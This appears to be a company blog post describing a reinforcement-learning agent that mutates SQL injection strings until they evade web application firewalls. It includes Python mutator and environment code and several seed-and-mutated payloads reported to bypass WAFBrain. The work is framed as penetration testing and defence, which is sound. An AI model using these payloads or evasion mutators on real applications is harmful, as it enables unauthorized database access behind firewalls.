Using Reinforcement Learning to Attack Web Application Firewalls

by Dr. Phil Winder, CEO

Introduction

Ideally, the best way to improve the security of any system is to detect all vulnerabilities and patch them. Unfortunately, this is rarely possible due to the extreme complexity of modern systems. One primary threat is malicious payloads arriving from the public internet, which attackers use to discover and exploit vulnerabilities. For this reason, organizations deploy web application firewalls (WAFs) to detect suspicious behaviour. WAFs are often rule-based, and when they detect nefarious activity they can block it, significantly reducing the overall damage.

However, a WAF's effectiveness depends entirely on its ability to decide whether a payload is harmful or harmless. This is a moving goalpost: attackers are constantly looking for new patterns that evade detection. WAFs are particularly vulnerable because of the sheer complexity of highly expressive languages like SQL and HTML, which allow the same payload to be written in many different ways.

Video

The video below presents an overview of the solution. You can also watch the full presentation here.



Reinforcement Learning

A solution to this problem is to build an autonomous agent that proactively attacks a WAF until it finds an exploitable weakness. Such an agent can generate malicious payloads and learn the weaknesses of the current WAF configuration. It can then report its findings to the cybersecurity team so that vulnerabilities are corrected and the overall security posture improves. This is one of the many reinforcement learning applications that Winder.AI delivers across industries.

Purpose

The purpose of this proof of concept (POC) was to investigate whether it was possible to design and train an agent that was capable of probing and finding weaknesses in commercial WAFs. Only SQL injection was considered in this phase, although other attack vectors are equally viable and valuable.

Value

Such a project is highly valuable but hard to quantify, because reputational damage, regulatory fines, and other post-compromise costs are only incurred after an attack has succeeded. But it is easy to see that any work to improve the security posture of an organization is valuable.

Solution

Any machine learning or reinforcement learning POC depends heavily on domain expertise. We therefore set out to collaborate closely with the client’s cybersecurity team to identify attack patterns they were interested in evaluating.

Model of the Solution



Our work was heavily inspired by previous research, and the high-level design of the setup does not differ significantly from previous efforts. The agent observes the current payload, an SQL query, after it has been tokenized. This allows the agent to “see” the current SQL query.

The agent then selects one of a range of actions, each of which mutates the query into a new one. The mutators alter the query, and the result is sent to the WAF under test.

If the WAF blocks the query, the cycle repeats. If the query passes through the WAF, the agent is rewarded and the episode ends.
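The cycle above can be sketched as a minimal environment in plain Python. This is an illustrative sketch, not the POC's code: `toy_waf_blocks` is a hypothetical one-rule WAF standing in for the real WAF under test, `tokenize` is a simple regex tokenizer, `comment_whitespace` is a single hypothetical mutator, and the reward of 1 for a bypass (0 otherwise) is an assumption. In the real setup the policy would be trained with Ray rather than sampled at random as it is here.

```python
import random
import re

# Hypothetical stand-in for the WAF under test: one regex rule that blocks
# "or <value>=<value>" tautologies when OR is followed by real whitespace.
TOY_WAF_RULE = re.compile(r"\bor\s+'?\w+'?\s*=\s*'?\w+", re.IGNORECASE)


def toy_waf_blocks(query: str) -> bool:
    """Return True if the toy WAF would block the query."""
    return TOY_WAF_RULE.search(query) is not None


def tokenize(query: str) -> list[str]:
    """Split a query into word, symbol and whitespace tokens, keeping order."""
    return re.findall(r"\s+|\w+|[^\w\s]", query)


def comment_whitespace(query: str, position: int) -> str:
    """Hypothetical mutator: replace the n-th whitespace run with /**/."""
    runs = list(re.finditer(r"\s+", query))
    if not runs:
        return query  # nothing left to mutate
    run = runs[position % len(runs)]
    return query[: run.start()] + "/**/" + query[run.end():]


class WafEnv:
    """Minimal episode loop: observe tokens, mutate, query the WAF, reward."""

    def __init__(self, seed_query: str, max_steps: int = 10):
        self.seed_query = seed_query
        self.max_steps = max_steps
        self.query = seed_query
        self.steps = 0

    def reset(self) -> list[str]:
        self.query = self.seed_query
        self.steps = 0
        return tokenize(self.query)

    def step(self, action: int) -> tuple[list[str], float, bool]:
        self.query = comment_whitespace(self.query, action)
        self.steps += 1
        bypassed = not toy_waf_blocks(self.query)
        reward = 1.0 if bypassed else 0.0  # reward only on a bypass
        done = bypassed or self.steps >= self.max_steps  # a bypass ends the episode
        return tokenize(self.query), reward, done


if __name__ == "__main__":
    env = WafEnv("a' or '1'='1")
    rng = random.Random(0)  # random policy as a placeholder for a trained agent
    obs, done = env.reset(), False
    while not done:
        obs, reward, done = env.step(rng.randrange(4))
    print(repr(env.query), reward)
```

With this seed, even the random placeholder policy bypasses the toy rule within two steps, because the rule only matches when OR is followed by real whitespace.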

Academic Research with Incorrect Results

Our early work showed that previously published research had serious flaws. The primary issue was that the reported results were artificially inflated because they counted invalid SQL as a success.

Most WAFs do not block requests that contain invalid SQL, so such requests appear to bypass the WAF. But invalid SQL is of no use to an attacker: the application's database cannot parse it and therefore cannot return any data.

Unfortunately, the successful results in the academic papers were all invalid SQL. When we recreated the results and fixed this issue, the agents were unable to bypass any WAF.
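One way to implement the fix is to gate the reward on validity as well as on the bypass. The sketch below is an assumption about how such a check could look, not the POC's implementation: it splices the payload into a hypothetical vulnerable query template and tries to run it against an in-memory SQLite database. SQLite is used only because it ships with Python; the payloads later in this article rely on MySQL-style `#` comments, which SQLite rejects, so a real check should use the same database engine as the target application.

```python
import sqlite3

# Hypothetical vulnerable query: the payload is spliced into a string literal,
# as in an application that concatenates user input into SQL.
TEMPLATE = "SELECT * FROM users WHERE name = '{}'"


def is_valid_sql(payload: str, template: str = TEMPLATE) -> bool:
    """Return True if the spliced query parses and runs against a scratch DB.

    SQLite stands in for the application's database here, so validity follows
    SQLite's dialect (for example, MySQL-style '#' comments are rejected).
    """
    conn = sqlite3.connect(":memory:")
    try:
        conn.execute("CREATE TABLE users (id INTEGER, name TEXT, userid TEXT)")
        conn.execute(template.format(payload))
        return True
    except (sqlite3.Error, sqlite3.Warning):
        # Syntax errors, unrecognized tokens, or extra statements count as invalid.
        return False
    finally:
        conn.close()


def reward(bypassed_waf: bool, payload: str) -> float:
    """Reward a payload only if it evades the WAF and is also valid SQL."""
    return 1.0 if bypassed_waf and is_valid_sql(payload) else 0.0
```

Under this rule, a payload such as `a' )` earns nothing even if the WAF lets it through, which removes exactly the inflated successes described above.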

A secondary issue was that many of the seed SQL injection statements were not useful for an attacker. For example, a single SELECT keyword may be valid, but it doesn’t return anything, and it can’t be mutated.

Novel Improvements

So we set out to fix these issues and successfully hack the WAFs by improving the state representation, the mutation selection, and the seed list.

Previous implementations used a histogram approach to represent the SQL query. This prevented the agent from being able to “see” the structure of the query: for example, a query containing a space and the same query containing a newline would look identical in the histogram. We replaced it with a proper tokenizer that preserves the order and position of each token.
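The difference can be illustrated with a small sketch. The character-class histogram here is a hypothetical featurizer, not the exact one used in previous work: it puts every whitespace character into one bucket and discards order, so a space and a newline are indistinguishable, whereas an ordered token list keeps both.

```python
import re
from collections import Counter


def char_class_histogram(query: str) -> Counter:
    """Hypothetical histogram featurizer that counts coarse character classes.

    Space, tab and newline all fall into one "whitespace" bucket, and the
    order of characters is discarded.
    """
    def char_class(ch: str) -> str:
        if ch.isspace():
            return "whitespace"
        if ch.isalpha():
            return "letter"
        if ch.isdigit():
            return "digit"
        return ch  # each punctuation character keeps its own bucket

    return Counter(char_class(ch) for ch in query)


def tokenize(query: str) -> list[str]:
    """Ordered token sequence that keeps each whitespace run verbatim."""
    return re.findall(r"\s+|\w+|[^\w\s]", query)


with_space = "a' or '1'='1"
with_newline = "a'\nor '1'='1"
# The histograms are identical, but the token sequences differ at index 2.
print(char_class_histogram(with_space) == char_class_histogram(with_newline))
print(tokenize(with_space)[2] == tokenize(with_newline)[2])
```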

On the action side, previous implementations included a high degree of randomness, often choosing mutations that produced completely random changes. This prevented the agent from learning which actions actually worked. We significantly improved the agent by making its actions more deterministic.
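A sketch of what a more deterministic action space could look like, under stated assumptions: each discrete action decodes to a (mutator, position) pair, and each hypothetical mutator maps a given query and position to exactly one new query, so the agent can associate an action with its effect. The two mutators mirror patterns visible in the results later in this article; in MySQL's default SQL mode, `||` and `&&` act as logical OR and AND. The names `MUTATORS`, `MAX_POSITIONS`, and `apply_action` are illustrative.

```python
import re


def whitespace_to_comment(query: str, position: int) -> str:
    """Replace the position-th whitespace run with an inline /**/ comment."""
    runs = list(re.finditer(r"\s+", query))
    if not runs:
        return query  # nothing to mutate: the action is a no-op
    run = runs[position % len(runs)]
    return query[: run.start()] + "/**/" + query[run.end():]


def swap_operator(query: str, position: int) -> str:
    """Rewrite the position-th OR/AND keyword as || or && (MySQL syntax)."""
    ops = list(re.finditer(r"\b(or|and)\b", query, re.IGNORECASE))
    if not ops:
        return query
    op = ops[position % len(ops)]
    symbol = "||" if op.group(1).lower() == "or" else "&&"
    return query[: op.start()] + symbol + query[op.end():]


# Hypothetical action layout: action = mutator_index * MAX_POSITIONS + position.
MUTATORS = [whitespace_to_comment, swap_operator]
MAX_POSITIONS = 8
ACTION_SPACE_SIZE = len(MUTATORS) * MAX_POSITIONS


def apply_action(query: str, action: int) -> str:
    """Decode a flat discrete action into (mutator, position) and apply it."""
    if not 0 <= action < ACTION_SPACE_SIZE:
        raise ValueError(f"action must be in [0, {ACTION_SPACE_SIZE})")
    mutator = MUTATORS[action // MAX_POSITIONS]
    return mutator(query, action % MAX_POSITIONS)
```

Because the same action on the same query always yields the same result, any reward the agent receives can be attributed to a specific, repeatable change.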

The final major improvement is the seed list. Every episode starts with a seed SQL query. We selected a range of queries that were genuine SQL injection payloads and left enough room for mutation.
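A minimal sketch of the "room for mutation" part of seed selection. The counting rule and the `min_sites` threshold of 3 are hypothetical choices for illustration; this filter does not check that a seed is a genuine injection, which still requires domain expertise or a separate validity check.

```python
import re


def mutation_sites(query: str) -> int:
    """Count whitespace gaps and OR/AND keywords that a mutator could act on."""
    gaps = len(re.findall(r"\s+", query.strip()))
    keywords = len(re.findall(r"\b(?:or|and)\b", query, re.IGNORECASE))
    return gaps + keywords


def filter_seeds(candidates: list[str], min_sites: int = 3) -> list[str]:
    """Keep seeds that leave enough room for mutation (hypothetical threshold)."""
    return [q for q in candidates if mutation_sites(q) >= min_sites]


seeds = ["SELECT", "a' or '1'='1';#", "x' and userid is NULL;#"]
print(filter_seeds(seeds))  # the bare SELECT keyword has no mutation sites
```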

Results of Training

After training the agent with the open-source Ray library, we targeted WAFBrain, an open-source, machine-learning-based WAF. It proved particularly vulnerable because its model has gaps that stem from gaps in its training data.

The following are a few of the many successful SQL attacks the agent learnt:

Original

a' or '1'='1';#

Mutated

a'#iE'UhC5
or#b4oIu@%
'1'='1';#

Original

" select * from users where id = 1 or ""%{"" or 1=1#1"

Mutated

" select#r}T%y
*#GT:-N
from/**/users#|/@RO2
where#.lr*b}
id#QL%fw
= 1#9.(i(
or#NJNml
""%{""#DX+69
or#>W4USn
1=1#1"

Original

x' and userid is NULL;#

Mutated

x'#c''b%8f
&&#P_If(@
#v3VjJ
userid#%g@aYV.
is#P^xkaUI
NULL;##R"~T/Dj

Original

' ) ) or ( ( 'x' ) ) = ( ( 'x

Mutated

' ) ) #C.HWX|r
|| ( (#sZWOS
'x' ) ) = ( ( 'x

Explanation of Results

The results show that the agent learnt to bypass WAFBrain using mutations such as inserting comments and newlines and replacing OR and AND with || and &&. Attackers could potentially use these queries to attack an application, knowing that they will bypass the WAF.

Crucially, these payloads are valid SQL, which means that the application behind the WAF will process them and return a response.

These statements can be passed to the cybersecurity team for further analysis and for adding to blacklists.
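The comment-and-newline pattern in the first example can be reproduced with a short sketch. This is a reconstruction from the outputs above, not the agent's actual mutator: it replaces every space with a MySQL `#` comment containing random padding, followed by a newline. MySQL ignores everything from `#` to the end of the line, so the database sees the same tokens while the WAF sees a very different string. The padding length and character set are assumptions.

```python
import random
import string

# Assumed padding alphabet; it contains no newline, so each comment ends
# exactly where the mutator inserts the line break.
PADDING = string.ascii_letters + string.digits + string.punctuation


def space_to_hash_comment(query: str, rng: random.Random, pad_len: int = 6) -> str:
    """Replace every space with '#<random padding>' plus a newline.

    MySQL treats '#' as a comment running to the end of the line, so the
    padding is invisible to the database but changes what the WAF inspects.
    """
    out = []
    for ch in query:
        if ch == " ":
            padding = "".join(rng.choice(PADDING) for _ in range(pad_len))
            out.append("#" + padding + "\n")
        else:
            out.append(ch)
    return "".join(out)


print(space_to_hash_comment("a' or '1'='1';#", random.Random(0)))
```

The output has the same three-line shape as the first mutated example (a', then or, then '1'='1';#), although the padding characters differ.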

Conclusions

We have shown in this POC that it is indeed possible to train a reinforcement-learning-based agent to exhibit sophisticated SQL generation behavior, to the point where it found holes in a popular open-source WAF implementation.

Previously published research had flaws that overstated the effectiveness of such agents, especially against the popular ModSecurity WAF, because the results had not accounted for invalid SQL. Indeed, our agent was not able to find any holes in the out-of-the-box ModSecurity implementation, which highlights how robust it is.

However, we suspect that systematic improvements to the agent’s state representation and action space could change this, given our experiences with other WAFs.

If you are responsible for operating a WAF in your organization, I recommend that you run penetration tests like this to check your configuration for holes. Get in touch with us if you’d like to learn more about how we can help you achieve this.

Future Work

There is significant scope to improve the action space and the state representation of the agent.

The observations could be represented with a more sophisticated embedding that allows greater contextual understanding of the query. The actions could also be improved to further reduce randomness and to give the agent the ability to construct its own SQL queries.

The mutation-based approach was a compromise that made the problem simpler. I’m confident that advances in language models will allow the agent to become more generative.

Future Application

Aside from productionizing the prototype, we see significant scope in the wider cybersecurity space. For example, we could develop agents that automatically test applications rather than WAFs, or that attack networks rather than languages. We’d love to hear from you if you have ideas you’re interested in exploring.

Contact

If this work is of interest to your organization, then please get in contact with the sales team to talk more about how we can help you.